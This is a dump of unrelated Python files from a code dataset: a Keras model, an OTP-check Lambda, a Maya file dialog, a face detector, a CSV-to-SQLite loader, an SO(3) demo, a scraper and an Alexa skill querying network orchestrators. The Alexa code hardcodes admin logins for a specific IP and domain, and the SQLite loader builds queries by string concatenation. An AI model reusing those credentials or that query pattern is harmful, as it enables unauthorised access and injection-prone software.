activation='relu'\n )\n\n self.batch_norm_1 = tf.keras.layers.BatchNormalization(\n fused=False)\n\n self.MaxPooling2D_1 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))\n\n self.Conv2D_2 = tf.keras.layers.Conv2D(\n 64, kernel_size=(2, 2),\n padding='same', activation='relu'\n )\n\n self.batch_norm_2 = tf.keras.layers.BatchNormalization(fused=False)\n\n self.MaxPooling2D_2 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))\n\n self.Conv2D_3 = tf.keras.layers.Conv2D(\n 128, kernel_size=(1, 1), padding='same'\n )\n\n self.Conv2D_4 = tf.keras.layers.Conv2D(\n 256, kernel_size=(1, 1), padding='same'\n )\n\n self.dense_1 = tf.keras.layers.Dense(1024)\n\n self.flatten = tf.keras.layers.Flatten()\n\n self.ouput_layer = tf.keras.layers.Dense(\n class_num, activation='softmax')\n\n def __gen_nn_structure(self, inputs):\n\n self.Conv2D_1 = self.Conv2D_1(inputs)\n self.batch_norm_1 = self.batch_norm_1(self.Conv2D_1)\n self.MaxPooling2D_1 = self.MaxPooling2D_1(self.batch_norm_1)\n self.Conv2D_2 = self.Conv2D_2(self.MaxPooling2D_1)\n self.batch_norm_2 = self.batch_norm_2(self.Conv2D_2)\n # self.MaxPooling2D_2 = self.MaxPooling2D_2(self.batch_norm_2)\n self.Conv2D_3 = self.Conv2D_3(self.batch_norm_2)\n self.l2_norm = tf.math.l2_normalize(\n self.Conv2D_3,\n axis=-1,\n epsilon=1e-12,\n name='l2norm',\n )\n self.Conv2D_4 = self.Conv2D_4(self.l2_norm)\n self.flatten = self.flatten(self.Conv2D_4)\n\n last_layer = self.ouput_layer(self.flatten)\n\n return tf.keras.Model(inputs=inputs, outputs=last_layer)\n\n def call(self, inputs):\n\n x = self.__gen_nn_structure(inputs=inputs)\n\n return x\n","sub_path":"ASR_Model.py","file_name":"ASR_Model.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"272471236","text":"import json, os, base64, random\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Hash import SHA256\n\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n \n if event['httpMethod'] == 'OPTIONS':\n return {\n \"statusCode\": 200,\n 'headers': {\n \"Access-Control-Allow-Headers\" : \"content-type\",\n \"Access-Control-Allow-Origin\" : \"*\"\n }\n }\n\n body = json.loads(event['body'])\n id = body['id']\n alias = body['alias']\n otp = body['otp']\n\n output = ''\n\n session_key_table = dynamodb.Table(os.environ['SESSION_KEY_TABLE'])\n\n # row = sessionKeyTable.query(KeyConditionExpression=Key('id').eq(id))['Items'][0]\n row = session_key_table.get_item(Key={'id': id})['Item']\n\n\n session_key = row['key']\n length = int(row['length'])\n\n sha256 = base64.b64encode(SHA256.new(base64.b64decode(session_key.encode('ascii'))).digest()).decode('ascii')\n output = otp == sha256[:length]\n\n if output:\n session_key_table.update_item(Key={\"id\": id}, UpdateExpression=\"set authenticated = :b\", ExpressionAttributeValues={':b': True})\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\n \"success\": output\n }),\n 'headers': {\n \"Access-Control-Allow-Headers\" : \"content-type\",\n \"Access-Control-Allow-Origin\" : \"*\"\n }\n }\n","sub_path":"SeQRe-API/functions/authenticate_session/authenticate_session.py","file_name":"authenticate_session.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279231745","text":"from PySide2 import QtCore\nfrom PySide2 import QtGui\nfrom PySide2 import QtWidgets\nimport maya.OpenMayaUI as omui\nfrom shiboken2 import wrapInstance\nimport maya.OpenMaya as om\nimport pymel.core as pm\nimport maya.cmds as cmds\n\ndef maya_main_weindow():\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtWidgets.QWidget)\n\n\nclass openImportWin(QtWidgets.QDialog):\n\n # 默认过滤器\n FILE_FILTERS = 'Maya (*.ma *.mb);;Maya ASCII (*.ma);;Maya Binary (*.mb);;ALL Files (*.*)'\n selected_filter = 'Maya (*.ma *.mb)'\n\n def __init__(self, parent=maya_main_weindow()):\n super(openImportWin, self).__init__(parent)\n\n self.setWindowTitle('Open/Import/Reference')\n self.setMinimumSize(300, 80)\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.fileoath_le = QtWidgets.QLineEdit()\n self.select_file_path_btn = QtWidgets.QPushButton()\n self.select_file_path_btn.setIcon(QtGui.QIcon(':fileOpen.png')) # 按钮图标的添加\n self.select_file_path_btn.setToolTip('select_file') # 按钮功能提示\n\n self.open_rb = QtWidgets.QRadioButton('Open')\n self.open_rb.setChecked(True)\n self.import_rb = QtWidgets.QRadioButton('Import')\n self.reference_rb = QtWidgets.QRadioButton('Reference')\n self.force_cb = QtWidgets.QCheckBox('Force')\n self.apply_btn = QtWidgets.QPushButton('Apply')\n self.close_btn = QtWidgets.QPushButton('Close')\n\n def create_layout(self):\n file_path_layout = QtWidgets.QHBoxLayout()\n file_path_layout.addWidget(self.fileoath_le)\n file_path_layout.addWidget(self.select_file_path_btn)\n\n radio_btn_layout = QtWidgets.QHBoxLayout()\n radio_btn_layout.addWidget(self.open_rb)\n radio_btn_layout.addWidget(self.import_rb)\n radio_btn_layout.addWidget(self.reference_rb)\n\n form_layout = QtWidgets.QFormLayout()\n form_layout.addRow('File:', file_path_layout)\n form_layout.addRow('', radio_btn_layout)\n form_layout.addRow('', self.force_cb)\n\n button_layout = QtWidgets.QHBoxLayout()\n button_layout.addWidget(self.apply_btn)\n button_layout.addWidget(self.close_btn)\n\n main_layout = QtWidgets.QVBoxLayout(self)\n main_layout.addLayout(form_layout)\n main_layout.addLayout(button_layout)\n\n def create_connections(self):\n self.select_file_path_btn.clicked.connect(self.show_file_select_dialog)\n self.open_rb.toggled.connect(self.update_force_vis)\n self.apply_btn.clicked.connect(self.load_file)\n\n self.close_btn.clicked.connect(self.close)\n\n def show_file_select_dialog(self):\n # 打开一个窗口获取路径,过滤器的使用\n file_paht, self.selected_filter = QtWidgets.QFileDialog.getOpenFileName(self, 'select_file', '', self.FILE_FILTERS, self.selected_filter)\n if file_paht:\n self.fileoath_le.setText(file_paht)\n\n def update_force_vis(self, checked):\n self.force_cb.setVisible(checked)\n\n def load_file(self):\n file_path = self.fileoath_le.text()\n if not file_path:\n return\n file_info = QtCore.QFileInfo(file_path)\n if not file_info.exists():\n om.MGlobal.displayError('File does not exist : {}'.format(file_path))\n return\n \n if self.open_rb.isChecked():\n self.open_file(file_path)\n elif self.import_rb.isChecked():\n self.import_file(file_path)\n else:\n self.reference_file(file_path)\n \n def open_file(self, file_path):\n force = self.force_cb.isChecked()\n if not force and cmds.file(q=True, modified=True):\n result = QtWidgets.QMessageBox.question(self, 'modified', 'not save ???')\n if result == QtWidgets.QMessageBox.StandardButton.Yes:\n force = True\n cmds.file(file_path, open=True, ignoreVersion=True, force=force)\n \n \n def import_file(self, file_path):\n cmds.file(file_path, i=True, ignoreVersion=True)\n \n def reference_file(self, file_path):\n cmds.file(file_path, reference=True, ignoreVersion=True)\n\n\nif __name__ == \"__main__\":\n try:\n ui.close()\n ui.deleteLater()\n except:\n pass\n ui = openImportWin()\n ui.show()\n","sub_path":"PySide/20190808/open_import_reference_tool/2019_08_07_05文件导入案例v01.py","file_name":"2019_08_07_05文件导入案例v01.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"300470164","text":"import sys\nimport json\nimport operator\n\ntry:\n\topen('summed_values.txt', 'x')\t# Tries to create the file\nexcept:\n\tpass\nf = open('summed_values.txt', 'r+')\ncontents = f.read()\nf.close()\nif(contents == \"\"):\n\tscores = {}\nelse:\n\tcontents = contents.replace(\"'\", '\"')\t# Python requires double quotes\n\tscores = json.loads(contents)\n\ndone_inputting = False\nwhile(not done_inputting):\n\tai_names = input(\"\\nPlease input AI names in format: '[, , ...]' (enter x to stop)\\n\")\n\tavg_points = input(\"Please input average points in format: '[, , ...] (enter x to stop)'\\n\")\n\n\tif(ai_names == 'x' or avg_points == 'x'):\n\t\tdone_inputting = True\n\t\tbreak\n\n\t# Remove brackets and split by commas\n\tai_names = ai_names[1:-1].split(',')\n\tavg_points = avg_points[1:-1].split(',')\n\n\t# Sum up nodes\n\tfor i in range(0, len(ai_names)):\n\t\tai_name = ai_names[i]\n\t\tif ai_name in scores:\n\t\t\tscores[ai_name] += float(avg_points[i])\n\t\telse:\n\t\t\tscores[ai_name] = float(avg_points[i])\n\n# Note: converts to list so don't write this to the file. Only for display purposes\nsorted_scores = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\nprint(\"Average Points for far:\")\nfor score in sorted_scores:\n\tprint(\"\\t\" + score[0] + \": \" + str(score[1]))\n\nf = open('summed_values.txt', 'w')\nf.write(str(scores))\nf.close()","sub_path":"sumUpPoints.py","file_name":"sumUpPoints.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"456084312","text":"import cv2\n\n# loading default face detector xml for face detection training\ntraining_data = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n\n# loading test image\nimg = cv2.imread(\"test-image.jpg\")\n\n# converting image to grayscale\ngrayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# getting face coordinate on image\nface_coordinates = training_data.detectMultiScale(grayscale_img)\n\n# marking faces with rectangular border\nfor (x, y, w, h) in face_coordinates:\n\tcv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0))\n\n# showing gray image on screen\ncv2.imshow(\"Showing Loaded Image\", img)\n\n# holding screen so users can view image\ncv2.waitKey()\n\n\n","sub_path":"face-detector.py","file_name":"face-detector.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"244305347","text":"i = 0\na, b = map(int, input().split())\na1 = 0\nb1 = 0\nst = 1\nr = 0\nwhile i == 0:\n comand = input()\n if comand == \"вперед\":\n a1 += st\n elif comand == \"направо\":\n a1, b1 = b1, a1\n if st == -1:\n st == -st\n r += 1\n elif comand == \"налево\":\n a1, b1 = b1, a1\n if st == 1:\n st = -st\n r -= 1\n elif comand == \"разворот\":\n st = -1\n elif comand == \"стоп\":\n if r % 2 == 0:\n i += 1\n print(\"Вы нашли клад,клад находитьсяя на\",a1,b1)\n else:\n i += 1\n print(\"Вы нашли клад,клад находитьсяя на\",b1,a1)\n else:\n print(\"Нет такой команды\")\n \n","sub_path":"ex2/Пракическая2.py","file_name":"Пракическая2.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"64671475","text":"\n## 여러개의 대용량 CSV 파일 --> SQLite\n\nfrom tkinter import *\n\nfrom tkinter.simpledialog import *\n\nfrom tkinter.filedialog import *\n\nimport csv\n\nimport json\n\nimport os\n\nimport os.path\n\nimport xlrd\n\nimport xlwt\n\nimport sqlite3\n\nimport pymysql\n\nimport glob\n\ncon = sqlite3.connect('c:/temp/userDB')\n\ncur = con.cursor()\n\n\n\n\n# 폴더 선택하고, 그 안의 파일목록들 추출하기.\n\ndirName = askdirectory()\n\nfile_list = glob.glob(os.path.join(dirName,\"*.csv\"))\n\n\n\n\n# 각 파일을 SQLite에 저장하기. (파일당 테이블 1개)\n\nfor input_file in file_list :\n\n filereader = open(input_file, 'r', newline='')\n\n csvReader = csv.reader(filereader)\n\n colList = next(csvReader) # 열이름들\n\n tableName = os.path.basename(input_file).split(\".\")[0]\n\n try :\n\n sql = \"CREATE TABLE \" + tableName + \"(\"\n\n for colName in colList :\n\n cList = colName.split()\n\n colName = ''\n\n for col in cList :\n\n colName += col + '_'\n\n colName = colName[:-1]\n\n sql += colName + \" CHAR(20),\"\n\n sql = sql[:-1]\n\n sql += ')'\n\n print(sql)\n\n cur.execute(sql)\n\n\n\n\n except :\n\n print('테이블 이상 -->', input_file)\n\n #continue\n\n\n\n\n for rowList in csvReader :\n\n sql = \"INSERT INTO \" + tableName + \" VALUES(\"\n\n for data in rowList :\n\n sql += \"'\" + data + \"',\"\n\n sql = sql[:-1] + ')'\n\n cur.execute(sql)\n\n\n\n\n filereader.close()\n\n con.commit()\n\n\n\n\ncur.close()\n\ncon.close()\n\nprint(\"OK!\")\n\n\n\n","sub_path":"csv_SQLite_save_direct.py","file_name":"csv_SQLite_save_direct.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"295273271","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport numpy.linalg as la\nfrom scipy.linalg import expm\n\n\ndef Rot3d(rpy):\n \"\"\"\n Transform a roll, pitch, yaw into a rotation matrix\n ASSUMES body/relative rotations i.e. \"rzyx\"\n :param rpy: roll, pitch, yaw\n :return: rotation matrix\n \"\"\"\n cx = np.cos(rpy[0])\n sx = np.sin(rpy[0])\n cy = np.cos(rpy[1])\n sy = np.sin(rpy[1])\n cz = np.cos(rpy[2])\n sz = np.sin(rpy[2])\n rot = np.array((\n [cx * cy, -sx * cz + sy * sz * cx, sx * sz + sy * cx * cz],\n [sx * cy, cx * cz + sx * sy * sz, -sz * cx + sx * sy * cz],\n [-sy, sz * cy, cy * cz]))\n\n return rot\n\n\ndef plotFrame(ax, pts, alpha=.3, tip='k'):\n # plots a RGB frame thing\n colors = ['r', 'g', 'b']\n for pt, color in zip(pts.T, colors):\n ax.plot([0, pt[0]],\n [0, pt[1]],\n [0, pt[2]],\n color=color, alpha=alpha)\n ax.scatter(*pt, color=tip) # put balls on the tips\n\n\nclass so3Grp(object):\n # a member, X, of the lie group so3\n def __init__(self, X):\n # make a member of the group\n self.X = X\n # asset we hold the group constraint\n # for numerics we have || X'X -I || < 1e-4\n assert la.norm(np.dot(X.T, X) - np.eye(3)) < 1e-4\n\n def __repr__(self):\n # prints the group member\n return self.X.__repr__()\n\n def inv(self):\n # reurns the inverse group member z* such that z*z=I\n return so3Grp((self.X).T) # cuz orthogonal matrix\n\n def mult(self, Z):\n # return a member from group_opp(self, z)\n Y = self.X.dot(Z.X)\n return so3Grp(Y)\n\n def step(self, v):\n # v is a member of the lie algebra (tanget space at the identy)\n # we want make a step of v at self\n v_local = v.adj(self) # convert step in global frame to local frame\n v_group = v_local.exp() # map to manifold\n return self.mult(v_group)\n\n def plot(self, ax, frame, alpha=.3, tip='k'):\n # plot a frame at the rotaiton\n frame_R = self.X.dot(frame)\n plotFrame(ax, frame_R, alpha, tip)\n\n\nclass so3Alg(object):\n # a member of the lie algabra of so3\n def __init__(self, w):\n # make the member\n # w is in R3 and is a preterbation about each axis\n self.w = w # vector space\n\n # W is the member of the algebra and is a skew sym matrix\n self.W = np.array([[0., -w[2], w[1]],\n [w[2], 0, -w[0]],\n [-w[1], w[0], 0]])\n\n def __repr__(self):\n # print the member\n return self.W.__repr__()\n\n def vee(self):\n # returns a memeber of the associated VECTOR space\n return self.w\n\n def exp(self):\n # map the lie algebra member to the corresponding lie group member\n X = expm(self.W)\n return so3Grp(X)\n\n def adj(self, Z):\n # Z is a member of the partent lie group\n # Z * self.W * Z.inv\n # sorry for the overload of matrix opps, blame numpy\n Z_inv = Z.inv()\n W_global = np.dot(Z_inv.X, self.W.dot(Z.X))\n # print(W_global) # need to extract w\n w_global = [W_global[2, 1], W_global[0, 2], W_global[1, 0]]\n\n return so3Alg(w_global)\n\n\nif __name__ == '__main__':\n\n Rtest1 = Rot3d([.1, .2, .2]) # about z, about y, about x\n Rtest2 = Rot3d([.0, .2, 0])\n frame = np.array([[1., 0., 0.],\n [0., 1., 0.],\n [0., 0., 1.]])\n\n A = so3Grp(Rtest1)\n B = so3Grp(Rtest2)\n C = A.mult(B)\n fig = plt.figure(figsize=(8, 6))\n ax = fig.add_subplot(111, projection='3d')\n\n # c.plot(ax, frame, alpha=1)\n plotFrame(ax, frame, alpha=.5)\n\n v = so3Alg([0, .8, 0]) # algebra\n V = v.exp() # group\n # print(vx)\n # print(v.W)\n AV_world = A.step(v)\n AV_body = A.mult(V)\n\n # should be the same as AV_world\n VA_world = V.mult(A)\n\n A.plot(ax, frame, tip='r')\n # V.plot(ax, frame, tip='b')\n\n # plot\n AV_body.plot(ax, frame, tip='g')\n AV_world.plot(ax, frame, tip='c')\n VA_world.plot(ax, frame, tip='m')\n\n print(AV_world)\n print(VA_world)\n\n\n # plotted for style\n\n ax.set_xlim([-2, 2])\n ax.set_ylim([-2, 2])\n ax.set_zlim([-2, 2])\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n plt.show()\n","sub_path":"so3.py","file_name":"so3.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"525798386","text":"import requests\nimport json\nimport os\nfrom bs4 import BeautifulSoup\nimport codecs\n# from multiprocessing import Pool\nimport time\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nCHARTER_CARD_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=card&id4='\nCHARTER_LINKS_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=links&id4='\nCHARTER_DOCUMENT_TEXT_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=document&id4='\n\nMUNICIPAL_CARDS_PATH = 'html/municipal_cards/'\n\nCHARTER_CARDS_PATH = 'html/chater_cards/'\ncharter_links_path = 'html/chater_links/'\ncharter_text_path = 'html/chater_texts/'\n\n\ndef load_html(url, filename, card_link=None):\n # if os.path.isfile(filename):\n # filesize = round(os.path.getsize(filename) / 1024, 1)\n # if filesize > 10:\n # print(filename, 'already exits', 'status ok')\n # return\n # else:\n # print(filename, 'already exits', 'status failed')\n\n # existed_filename = filename.split('/')[0] + '/' + filename.split('/')[1].split('_')[0] + '.html'\n #\n # # print(existed_filename)\n # if os.path.isfile(existed_filename):\n # # print(filename, 'already exits')\n # os.rename(existed_filename, filename)\n # return\n\n # override wrong id numbers\n correct_filename = filename.split('/')[0] + '/' + \\\n filename.split('/')[1].split('_')[0] + '_' + filename.split('/')[1].split('_')[1] + '/' + \\\n filename.split('/')[2].split('_')[0] + \\\n '_' + card_link + '.html'\n\n print(correct_filename)\n if os.path.isfile(filename):\n try:\n print(filename, 'already exits')\n os.rename(filename, correct_filename)\n except:\n os.remove(filename)\n return\n\n # # print(url)\n # r = requests.get(url, stream=True)\n # with open(filename, 'wb') as f:\n # for chunk in r.iter_content(chunk_size=1024):\n # if chunk:\n # f.write(chunk)\n #\n # load_html(url, filename)\n\n\ndef create_dir(dir_path):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\ndef foo(html):\n if html.endswith('.html'):\n # print(html)\n with codecs.open(MUNICIPAL_CARDS_PATH + html, 'r') as f:\n document = BeautifulSoup(f.read(), \"lxml\")\n # for td in document.findAll('td', {'class':'search_result_cell'}):\n # print(td.findAll('a'))\n\n try:\n card_link = list(filter(lambda x: x.findAll('a'), document.findAll('', {'align': 'center'})))[0]\n card_link = card_link.findAll('a')[0]['href']\n card_link = card_link.split('id4=')[1]\n\n load_html(CHARTER_CARD_PATTERN + card_link, CHARTER_CARDS_PATH + html, card_link)\n load_html(CHARTER_DOCUMENT_TEXT_PATTERN + card_link, charter_text_path + html, card_link)\n load_html(CHARTER_LINKS_PATTERN + card_link, charter_links_path + html, card_link)\n\n # print(card_link)\n except:\n # print('Пустой')\n pass\n\ncreate_dir(CHARTER_CARDS_PATH)\ncreate_dir(charter_links_path)\ncreate_dir(charter_text_path)\n\npool = ThreadPool(8)\n\npool.map(foo, os.listdir(MUNICIPAL_CARDS_PATH))\n\n# for html in os.listdir(preview_html_path):\n# if html.endswith('.html'):\n# print(html)\n# with codecs.open(preview_html_path + html, 'r') as f:\n# document = BeautifulSoup(f.read(), \"lxml\")\n# # for td in document.findAll('td', {'class':'search_result_cell'}):\n# # print(td.findAll('a'))\n#\n# try:\n# card_link = list(filter(lambda x: x.findAll('a'), document.findAll('', {'align': 'center'})))[0]\n# card_link = card_link.findAll('a')[0]['href']\n# card_link = card_link.split('id4=')[1]\n#\n# load_html(CHARTER_CARDS_PATH + CHARTER_CARD_PATTERN + card_link)\n# load_html(charter_text_path + CHARTER_DOCUMENT_TEXT_PATTERN + card_link)\n# load_html(charter_links_path + CHARTER_LINKS_PATTERN + card_link)\n#\n# print(card_link)\n# except:\n# print('Пустой')\n\npool.close()\npool.join()\n\nprint('finish')","sub_path":"charter_html_loader.py","file_name":"charter_html_loader.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"540487277","text":"# -*- coding: utf-8 -*-\nimport random\n\nimport logging\n\nfrom typing import Union, List\n\nfrom ask_sdk.standard import StandardSkillBuilder\nfrom ask_sdk_core.dispatch_components import (AbstractRequestHandler, AbstractExceptionHandler,AbstractRequestInterceptor, AbstractResponseInterceptor)\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_model.services.monetization import (EntitledState, PurchasableState, InSkillProductsResponse, Error,InSkillProduct)\nfrom ask_sdk_model.interfaces.monetization.v1 import PurchaseResult\nfrom ask_sdk_model import Response, IntentRequest\nfrom ask_sdk_model.interfaces.connections import SendRequestDirective\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# Data for the skill\n\n# Static list of facts across 3 categories that serve as\n# the free and premium content served by the Skill\nall_facts = [\n {\n \"type\": \"science\",\n \"fact\": \"The current status of NSO is:\"\n },\n ]\n\nskill_name = \"Infinity Labs\"\n\n# Utility functions\n\ndef get_all_entitled_products(in_skill_product_list):\n \"\"\"Get list of in-skill products in ENTITLED state.\"\"\"\n # type: (List[InSkillProduct]) -> List[InSkillProduct]\n entitled_product_list = [ l for l in in_skill_product_list if (l.entitled == EntitledState.ENTITLED)]\n return entitled_product_list\n\ndef get_random_from_list(facts):\n \"\"\"Return the fact message from randomly chosen list element.\"\"\"\n # type: (List) -> str\n fact_item = random.choice(facts)\n return fact_item.get(\"fact\")\n\ndef get_random_yes_no_question():\n \"\"\"Return random question for YES/NO answering.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know about current available automation packages, devices, VPN Or You want to create new vpn service.......?\"\n ]\n return random.choice(questions)\n \ndef create_service():\n import json\n import time\n import requests\n \"\"\"Return random question for YES/NO answering.\"\"\"\n # type: () -> str\n code= requests.get(\"http://203.122.19.100:6661/api/operational/devices\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:devices']\n m=w['device']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Please Provide the new vpn name....\",items\n \ndef check_status():\n import json\n import time\n import requests\n code= requests.get('http://203.122.19.100:6661/api/running',auth=(\"admin\",\"admin\"))\n if (code.status_code == 200):\n return \"The current status of Orchestrator is: running.......\"\n else:\n return \"The current status of Orchestrator is not running...........\"\n \ndef package_info():\n import requests\n import time\n import json \n code= requests.get(\"http://203.122.19.100:6661/api/operational/packages\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:packages']\n m=w['package']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current available packages are..\",items\n \ndef welcome_script():\n return \"Guest Welcome script I will provide in a while for any other question the answer will be as below:\"\n\n\n\n\n###################################################################\n##################### SDDEV INFORMATION #########################\n###################################################################\n\n\ndef sddevdevice_info():\n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/devices\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running devices are\", items\n#print(sddevdevice_info())\n\n\n\ndef sddevsites_info():\n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/sites\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running sites are\", items\n#print(sddevsites_info())\n\n\n\ndef sddevpid_count():\n \n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n indexY = 0\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/licenses\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n #print(len(db['data'][0]['plid']\n items = []\n for item in db:\n items.append(item['plid'])\n indexY= indexY + 1\n \n \n return indexY\n return \"Current running pid are\", x\n #print(len(db['data'][0]['plid']\n #print(len(db['data'][0]['plid'])\n#print(indexY)\n#print(sddevdevice_info())\nx= sddevpid_count()\nprint(x)\n\n\n\ndef sddevuser_count():\n \n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n indexY = 0\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/users/0\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n #print(len(db['data'][0]['plid']\n items = []\n for item in db:\n items.append(item['username'])\n indexY= indexY + 1\n \n \n return indexY\n #return \"Current running users are\", indexY\n #print(len(db['data'][0]['plid']\n #print(len(db['data'][0]['plid'])\n#print(indexY)\n#print(sddevdevice_info())\nx= sddevuser_count()\nprint(x)\n\n\n\ndef sddevactivelicense_count():\n \n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n indexY = 0\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/licenses\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n #print(len(db['data'][0]['plid']\n items = []\n for item in db:\n if item['license']['isActive'] :\n indexY= indexY + 1\n \n \n return indexY\n return \"Current running Active licenses are\", indexY\n #print(len(db['data'][0]['plid']\n #print(len(db['data'][0]['plid'])\n#print(indexY)\n#print(sddevdevice_info())\nx= sddevactivelicense_count()\nprint(x)\n\n\n##############################################################################################################################\n\ndef get_random_config():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO ?\"\n ]\n return random.choice(questions)\n\ndef get_random_configure():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO ?\"\n ]\n return random.choice(questions)\n\ndef get_random_configs():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"Do you want to know more about NSO?\"\n ]\n return random.choice(questions)\n \ndef get_random_configsz():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \" \"\n ]\n return random.choice(questions) \n \ndef get_random_configz():\n \"\"\"Return random config message.\"\"\"\n # type: () -> str\n questions = [\n \"\"\n ]\n return random.choice(questions)\n \ndef service_info():\n import requests\n import time\n import json \n code= requests.get(\"http://203.122.19.100:6661/api/operational/services\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:services']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running services are\" ,items\n \ndef delete_service(request):\n import requests\n import time\n import json\n code= requests.get(\"http://203.122.19.100:6661/api/operational/services\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = 